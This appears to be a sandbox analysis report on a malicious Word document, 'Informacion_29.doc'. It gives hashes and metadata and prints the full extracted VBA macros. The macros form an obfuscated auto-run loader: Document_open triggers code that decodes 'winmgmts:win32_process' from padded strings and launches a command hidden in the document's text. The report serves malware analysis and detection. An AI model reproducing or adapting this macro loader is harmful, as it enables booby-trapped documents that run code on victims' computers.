                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                              MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                              SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                              SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                              SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core, Author: Mohamed Gaillard, Template: Normal.dotm, Last Saved By: Louise Fleury, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 06:14:00 2020, Last Saved Time/Date: Tue Dec 29 06:15:00 2020, Number of Pages: 1, Number of Words: 2867, Number of Characters: 16346, Security: 8
                                              Entropy (8bit):6.654073649441584
                                              TrID:
                                              • Microsoft Word document (32009/1) 79.99%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                              File name:Informacion_29.doc
                                              File size:165023
                                              MD5:6c1cb4c06ead6f5ce29a931fa12410fa
                                              SHA1:4ac228fa54e73993dcccb69389a97cfcf67228b5
                                              SHA256:43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3
                                              SHA512:f71192ea05b085bf7dc0add6340bee96eb5885cf1720d15b772e7b60b02f55f4004969fbff42cb2804f9c31435a1015a31ed77d4205be3535e7095e980f2142c
                                              SSDEEP:3072:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4o9ufstRUUKSns8T00JSHUgteMJ8qMD7gb:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4r
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Informacion_29.doc"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Office Word
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Title:
                                              Subject:Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core
                                              Author:Mohamed Gaillard
                                              Keywords:
                                              Comments:
                                              Template:Normal.dotm
                                              Last Saved By:Louise Fleury
                                              Revision Number:1
                                              Total Edit Time:0
                                              Create Time:2020-12-29 06:14:00
                                              Last Saved Time:2020-12-29 06:15:00
                                              Number of Pages:1
                                              Number of Words:2867
                                              Number of Characters:16346
                                              Creating Application:Microsoft Office Word
                                              Security:8

                                              Document Summary

                                              Document Code Page:1252
                                              Number of Lines:136
                                              Number of Paragraphs:38
                                              Thumbnail Scaling Desired:False
                                              Company:
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:786432

                                              Streams with VBA

                                              VBA File Name: Jwq9b1lb0hmm7, Stream Size: 14416
                                              General
                                              Stream Path:Macros/VBA/Jwq9b1lb0hmm7
                                              VBA File Name:Jwq9b1lb0hmm7
                                              Stream Size:14416
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 fc 0a 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 03 0b 00 00 9f 29 00 00 00 00 00 00 01 00 00 00 06 12 1b 22 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              MoyUg
                                              #BrygCBI
                                              HQLYP()
                                              gNNhpjuZF:
                                              ywWmAGeG:
                                              WkbcFJEAD()
                                              Gyyqq()
                                              Access
                                              #pIXfAL
                                              Len(mKbjhqs))
                                              dNGEjAD
                                              #rxYZps,
                                              gJLEFBFsL()
                                              AeWeHOJCg
                                              tKzwqzI()
                                              Resume
                                              "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG"
                                              tKzwqzI
                                              #MoyUg
                                              SkWVG
                                              "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf"
                                              RimyuHaBD:
                                              #DfnXDeC,
                                              DfnXDeC
                                              GbSOBaBqc:
                                              UfOeJ
                                              wcDKJI
                                              "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX"
                                              #BIeAA,
                                              "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH"
                                              VORRAG()
                                              kBZBQ()
                                              #DfnXDeC
                                              "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB"
                                              ktJgD
                                              ktJgD()
                                              #dNGEjAD,
                                              #MoyUg,
                                              "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA"
                                              fMGbFJDRE
                                              JeDBhB()
                                              FreeFile
                                              DnGiABxzG()
                                              Gyyqq
                                              LOF(intGend)
                                              #fFPBDj,
                                              XNcuAGoGD:
                                              "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF"
                                              LITXEDEBE
                                              #tSFvVJKHm
                                              JeDBhB
                                              BIeAA
                                              ZWAfIID
                                              #BrygCBI,
                                              "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW"
                                              "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm"
                                              #vjURJ
                                              "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG"
                                              "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ"
                                              #JvVTCss
                                              ykcixJTsM:
                                              "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ"
                                              ZCRUUEr
                                              #aPIAJ
                                              pIXfAL
                                              "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc"
                                              snahbsd
                                              NFVBCEf
                                              "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB"
                                              ReDim
                                              "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF"
                                              lkVoRJ
                                              BrygCBI
                                              #efPVC
                                              "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD"
                                              AUrNIzEG()
                                              #fFPBDj
                                              RimyuHaBD
                                              #UfOeJ,
                                              WppWDKHVA
                                              "F:\ySkIB\qKFmg\KrORs.CZcSEH"
                                              "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH"
                                              qKxQJQE
                                              #pIXfAL,
                                              kBZBQ
                                              "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB"
                                              #pGKDuEB,
                                              fMGbFJDRE:
                                              qKxQJQE:
                                              "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ"
                                              DnGiABxzG
                                              VORRAG
                                              "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD"
                                              "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH"
                                              hSQRFSr
                                              Binary
                                              XNcuAGoGD
                                              COxEbv
                                              wcDKJI:
                                              "O:\BNSoFH\dvEzG\mUAiwC.yubtGH"
                                              "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP"
                                              "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX"
                                              efPVC
                                              #ksQLDZi,
                                              lOETktD:
                                              pGKDuEB
                                              "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu"
                                              #JvVTCss,
                                              Integer
                                              NFVBCEf()
                                              #WppWDKHVA,
                                              JJjHG:
                                              "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh"
                                              SkWVG()
                                              RzwvkExUI()
                                              vjURJ
                                              GbSOBaBqc
                                              cgFzqJS
                                              Error
                                              #vjURJ,
                                              aPIAJ
                                              LITXEDEBE()
                                              #BIeAA
                                              ywWmAGeG
                                              gNNhpjuZF
                                              RzwvkExUI
                                              "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH"
                                              ZCRUUEr:
                                              Attribute
                                              ykcixJTsM
                                              #WppWDKHVA
                                              AeWeHOJCg:
                                              Mid(mKbjhqs,
                                              hSQRFSr:
                                              lOETktD
                                              #lkVoRJ
                                              #rxYZps
                                              Close
                                              "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE"
                                              rxYZps
                                              nOveD
                                              nOveD()
                                              "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA"
                                              VB_Name
                                              fFPBDj
                                              uUxhxDE:
                                              "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl"
                                              cgFzqJS:
                                              JJjHG
                                              sYcQrq()
                                              Function
                                              #tSFvVJKHm,
                                              #UfOeJ
                                              #pGKDuEB
                                              #dNGEjAD
                                              COxEbv()
                                              VSbuEj:
                                              #ksQLDZi
                                              sYcQrq
                                              HQLYP
                                              ksQLDZi
                                              #lkVoRJ,
                                              JvVTCss
                                              "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG"
                                              #efPVC,
                                              ZWAfIID:
                                              gJLEFBFsL
                                              "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF"
                                              WkbcFJEAD
                                              mKbjhqs
                                              VSbuEj
                                              AUrNIzEG
                                              "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU"
                                              uUxhxDE
                                              "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV"
                                              "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf"
                                              #aPIAJ,
                                              tSFvVJKHm
                                              VBA Code
                                              Attribute VB_Name = "Jwq9b1lb0hmm7"
                                              Function Nr8et74sjtle6s()
                                              On Error Resume Next
                                              mKbjhqs = Ouz_y28f7ehnqn.StoryRanges.Item(244 / 244)
                                                 GoTo ywWmAGeG
                                              Dim VORRAG() As Byte
                                              Dim DfnXDeC As Integer
                                              DfnXDeC = FreeFile
                                              Open "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU" For Binary Access Read As #DfnXDeC
                                              Open "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE" For Binary Access Read As #DfnXDeC
                                              ReDim VORRAG(1 To LOF(intGend) - 5)
                                              Get #DfnXDeC, , VORRAG
                                              Get #DfnXDeC, , VORRAG
                                              Get #DfnXDeC, , VORRAG
                                              Close #DfnXDeC
                                              ywWmAGeG:
                                              snahbsd = "]b2[sp]b2[s"
                                              Umvc8xcohh1q3zu0kx = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
                                                 GoTo gNNhpjuZF
                                              Dim JeDBhB() As Byte
                                              Dim efPVC As Integer
                                              efPVC = FreeFile
                                              Open "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA" For Binary Access Read As #efPVC
                                              Open "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB" For Binary Access Read As #efPVC
                                              ReDim JeDBhB(1 To LOF(intGend) - 5)
                                              Get #efPVC, , JeDBhB
                                              Get #efPVC, , JeDBhB
                                              Get #efPVC, , JeDBhB
                                              Close #efPVC
                                              gNNhpjuZF:
                                              Ay7bggewedd3phn5 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
                                                 GoTo ZCRUUEr
                                              Dim COxEbv() As Byte
                                              Dim pIXfAL As Integer
                                              pIXfAL = FreeFile
                                              Open "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ" For Binary Access Read As #pIXfAL
                                              Open "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA" For Binary Access Read As #pIXfAL
                                              ReDim COxEbv(1 To LOF(intGend) - 5)
                                              Get #pIXfAL, , COxEbv
                                              Get #pIXfAL, , COxEbv
                                              Get #pIXfAL, , COxEbv
                                              Close #pIXfAL
                                              ZCRUUEr:
                                              Imytpzb0s5n = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
                                                 GoTo XNcuAGoGD
                                              Dim NFVBCEf() As Byte
                                              Dim MoyUg As Integer
                                              MoyUg = FreeFile
                                              Open "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl" For Binary Access Read As #MoyUg
                                              Open "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf" For Binary Access Read As #MoyUg
                                              ReDim NFVBCEf(1 To LOF(intGend) - 5)
                                              Get #MoyUg, , NFVBCEf
                                              Get #MoyUg, , NFVBCEf
                                              Get #MoyUg, , NFVBCEf
                                              Close #MoyUg
                                              XNcuAGoGD:
                                              B5vh4w9yggemggw4dw = "]b2[ss]b2[s"
                                                 GoTo AeWeHOJCg
                                              Dim kBZBQ() As Byte
                                              Dim dNGEjAD As Integer
                                              dNGEjAD = FreeFile
                                              Open "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ" For Binary Access Read As #dNGEjAD
                                              Open "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD" For Binary Access Read As #dNGEjAD
                                              ReDim kBZBQ(1 To LOF(intGend) - 5)
                                              Get #dNGEjAD, , kBZBQ
                                              Get #dNGEjAD, , kBZBQ
                                              Get #dNGEjAD, , kBZBQ
                                              Close #dNGEjAD
                                              AeWeHOJCg:
                                              U5bklmbs296g6nu09w = Imytpzb0s5n + B5vh4w9yggemggw4dw + Ay7bggewedd3phn5 + snahbsd + Umvc8xcohh1q3zu0kx
                                                 GoTo GbSOBaBqc
                                              Dim HQLYP() As Byte
                                              Dim vjURJ As Integer
                                              vjURJ = FreeFile
                                              Open "F:\ySkIB\qKFmg\KrORs.CZcSEH" For Binary Access Read As #vjURJ
                                              Open "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF" For Binary Access Read As #vjURJ
                                              ReDim HQLYP(1 To LOF(intGend) - 5)
                                              Get #vjURJ, , HQLYP
                                              Get #vjURJ, , HQLYP
                                              Get #vjURJ, , HQLYP
                                              Close #vjURJ
                                              GbSOBaBqc:
                                              Jf4lj98w22pm0 = Tfizx5uxnfjbxnml(U5bklmbs296g6nu09w)
                                                 GoTo ykcixJTsM
                                              Dim DnGiABxzG() As Byte
                                              Dim pGKDuEB As Integer
                                              pGKDuEB = FreeFile
                                              Open "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP" For Binary Access Read As #pGKDuEB
                                              Open "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF" For Binary Access Read As #pGKDuEB
                                              ReDim DnGiABxzG(1 To LOF(intGend) - 5)
                                              Get #pGKDuEB, , DnGiABxzG
                                              Get #pGKDuEB, , DnGiABxzG
                                              Get #pGKDuEB, , DnGiABxzG
                                              Close #pGKDuEB
                                              ykcixJTsM:
                                              Set Wvxrpert99ob1x = CreateObject(Jf4lj98w22pm0)
                                                 GoTo uUxhxDE
                                              Dim AUrNIzEG() As Byte
                                              Dim lkVoRJ As Integer
                                              lkVoRJ = FreeFile
                                              Open "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG" For Binary Access Read As #lkVoRJ
                                              Open "O:\BNSoFH\dvEzG\mUAiwC.yubtGH" For Binary Access Read As #lkVoRJ
                                              ReDim AUrNIzEG(1 To LOF(intGend) - 5)
                                              Get #lkVoRJ, , AUrNIzEG
                                              Get #lkVoRJ, , AUrNIzEG
                                              Get #lkVoRJ, , AUrNIzEG
                                              Close #lkVoRJ
                                              uUxhxDE:
                                              Ysqw359hi8dilh_ = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
                                                 GoTo qKxQJQE
                                              Dim LITXEDEBE() As Byte
                                              Dim JvVTCss As Integer
                                              JvVTCss = FreeFile
                                              Open "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh" For Binary Access Read As #JvVTCss
                                              Open "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB" For Binary Access Read As #JvVTCss
                                              ReDim LITXEDEBE(1 To LOF(intGend) - 5)
                                              Get #JvVTCss, , LITXEDEBE
                                              Get #JvVTCss, , LITXEDEBE
                                              Get #JvVTCss, , LITXEDEBE
                                              Close #JvVTCss
                                              qKxQJQE:
                                                 GoTo ZWAfIID
                                              Dim sYcQrq() As Byte
                                              Dim aPIAJ As Integer
                                              aPIAJ = FreeFile
                                              Open "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW" For Binary Access Read As #aPIAJ
                                              Open "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH" For Binary Access Read As #aPIAJ
                                              ReDim sYcQrq(1 To LOF(intGend) - 5)
                                              Get #aPIAJ, , sYcQrq
                                              Get #aPIAJ, , sYcQrq
                                              Get #aPIAJ, , sYcQrq
                                              Close #aPIAJ
                                              ZWAfIID:
                                              Wvxrpert99ob1x.Create Tfizx5uxnfjbxnml(Ysqw359hi8dilh_), Il6ap8xlb73, C1lvz_08ro0vrbmv6
                                                 GoTo cgFzqJS
                                              Dim ktJgD() As Byte
                                              Dim rxYZps As Integer
                                              rxYZps = FreeFile
                                              Open "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH" For Binary Access Read As #rxYZps
                                              Open "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD" For Binary Access Read As #rxYZps
                                              ReDim ktJgD(1 To LOF(intGend) - 5)
                                              Get #rxYZps, , ktJgD
                                              Get #rxYZps, , ktJgD
                                              Get #rxYZps, , ktJgD
                                              Close #rxYZps
                                              cgFzqJS:
                                                 GoTo fMGbFJDRE
                                              Dim Gyyqq() As Byte
                                              Dim UfOeJ As Integer
                                              UfOeJ = FreeFile
                                              Open "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH" For Binary Access Read As #UfOeJ
                                              Open "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF" For Binary Access Read As #UfOeJ
                                              ReDim Gyyqq(1 To LOF(intGend) - 5)
                                              Get #UfOeJ, , Gyyqq
                                              Get #UfOeJ, , Gyyqq
                                              Get #UfOeJ, , Gyyqq
                                              Close #UfOeJ
                                              fMGbFJDRE:
                                              End Function
                                              Function Tfizx5uxnfjbxnml(Vxdy838fy4c1xspht)
                                              On Error Resume Next
                                                 GoTo wcDKJI
                                              Dim tKzwqzI() As Byte
                                              Dim BrygCBI As Integer
                                              BrygCBI = FreeFile
                                              Open "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu" For Binary Access Read As #BrygCBI
                                              Open "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG" For Binary Access Read As #BrygCBI
                                              ReDim tKzwqzI(1 To LOF(intGend) - 5)
                                              Get #BrygCBI, , tKzwqzI
                                              Get #BrygCBI, , tKzwqzI
                                              Get #BrygCBI, , tKzwqzI
                                              Close #BrygCBI
                                              wcDKJI:
                                              Tt79y87d36ripg03s = (Vxdy838fy4c1xspht)
                                                 GoTo lOETktD
                                              Dim gJLEFBFsL() As Byte
                                              Dim BIeAA As Integer
                                              BIeAA = FreeFile
                                              Open "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf" For Binary Access Read As #BIeAA
                                              Open "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG" For Binary Access Read As #BIeAA
                                              ReDim gJLEFBFsL(1 To LOF(intGend) - 5)
                                              Get #BIeAA, , gJLEFBFsL
                                              Get #BIeAA, , gJLEFBFsL
                                              Get #BIeAA, , gJLEFBFsL
                                              Close #BIeAA
                                              lOETktD:
                                              Haq5kvro2d9z = Xrl25i0p5sd_oj40b(Tt79y87d36ripg03s)
                                                 GoTo RimyuHaBD
                                              Dim nOveD() As Byte
                                              Dim fFPBDj As Integer
                                              fFPBDj = FreeFile
                                              Open "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc" For Binary Access Read As #fFPBDj
                                              Open "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm" For Binary Access Read As #fFPBDj
                                              ReDim nOveD(1 To LOF(intGend) - 5)
                                              Get #fFPBDj, , nOveD
                                              Get #fFPBDj, , nOveD
                                              Get #fFPBDj, , nOveD
                                              Close #fFPBDj
                                              RimyuHaBD:
                                              Tfizx5uxnfjbxnml = Haq5kvro2d9z
                                                 GoTo VSbuEj
                                              Dim RzwvkExUI() As Byte
                                              Dim tSFvVJKHm As Integer
                                              tSFvVJKHm = FreeFile
                                              Open "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH" For Binary Access Read As #tSFvVJKHm
                                              Open "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB" For Binary Access Read As #tSFvVJKHm
                                              ReDim RzwvkExUI(1 To LOF(intGend) - 5)
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Get #tSFvVJKHm, , RzwvkExUI
                                              Close #tSFvVJKHm
                                              VSbuEj:
                                              End Function
                                              Function Xrl25i0p5sd_oj40b(Rttd6rymyw4z)
                                              W7t8l1jd1ya = Ubnvz_721a0k0z7gn
                                                 GoTo JJjHG
                                              Dim SkWVG() As Byte
                                              Dim ksQLDZi As Integer
                                              ksQLDZi = FreeFile
                                              Open "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX" For Binary Access Read As #ksQLDZi
                                              Open "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ" For Binary Access Read As #ksQLDZi
                                              ReDim SkWVG(1 To LOF(intGend) - 5)
                                              Get #ksQLDZi, , SkWVG
                                              Get #ksQLDZi, , SkWVG
                                              Get #ksQLDZi, , SkWVG
                                              Close #ksQLDZi
                                              JJjHG:
                                              Xrl25i0p5sd_oj40b = Replace(Rttd6rymyw4z, "]b2[s", Zxrltp30ofw)
                                                 GoTo hSQRFSr
                                              Dim WkbcFJEAD() As Byte
                                              Dim WppWDKHVA As Integer
                                              WppWDKHVA = FreeFile
                                              Open "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX" For Binary Access Read As #WppWDKHVA
                                              Open "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV" For Binary Access Read As #WppWDKHVA
                                              ReDim WkbcFJEAD(1 To LOF(intGend) - 5)
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Get #WppWDKHVA, , WkbcFJEAD
                                              Close #WppWDKHVA
                                              hSQRFSr:
                                              End Function
                                              VBA File Name: Ouz_y28f7ehnqn, Stream Size: 1113
                                              General
                                              Stream Path: Macros/VBA/Ouz_y28f7ehnqn
                                              VBA File Name: Ouz_y28f7ehnqn
                                              Stream Size: 1113
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 06 12 10 98 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Creatable
                                              VB_Name
                                              Document_open()
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "Ouz_y28f7ehnqn"
                                              Attribute VB_Base = "1Normal.ThisDocument"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = True
                                              Attribute VB_Customizable = True
                                              Private Sub Document_open()
                                              Nr8et74sjtle6s
                                              End Sub
                                              VBA File Name: Z5ncc5dwidbkjld, Stream Size: 702
                                              General
                                              Stream Path: Macros/VBA/Z5ncc5dwidbkjld
                                              VBA File Name: Z5ncc5dwidbkjld
                                              Stream Size: 702
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 06 12 4d 00 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              Attribute
                                              VB_Name
                                              VBA Code
                                              Attribute VB_Name = "Z5ncc5dwidbkjld"

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 121
                                              General
                                              Stream Path: \x1CompObj
                                              File Type: data
                                              Stream Size: 121
                                              Entropy: 4.36374049783
                                              Base64 Encoded: True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path: \x5DocumentSummaryInformation
                                              File Type: data
                                              Stream Size: 4096
                                              Entropy: 0.24979504615
                                              Base64 Encoded: False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 576
                                              General
                                              Stream Path: \x5SummaryInformation
                                              File Type: data
                                              Stream Size: 576
                                              Entropy: 4.29333303912
                                              Base64 Encoded: True
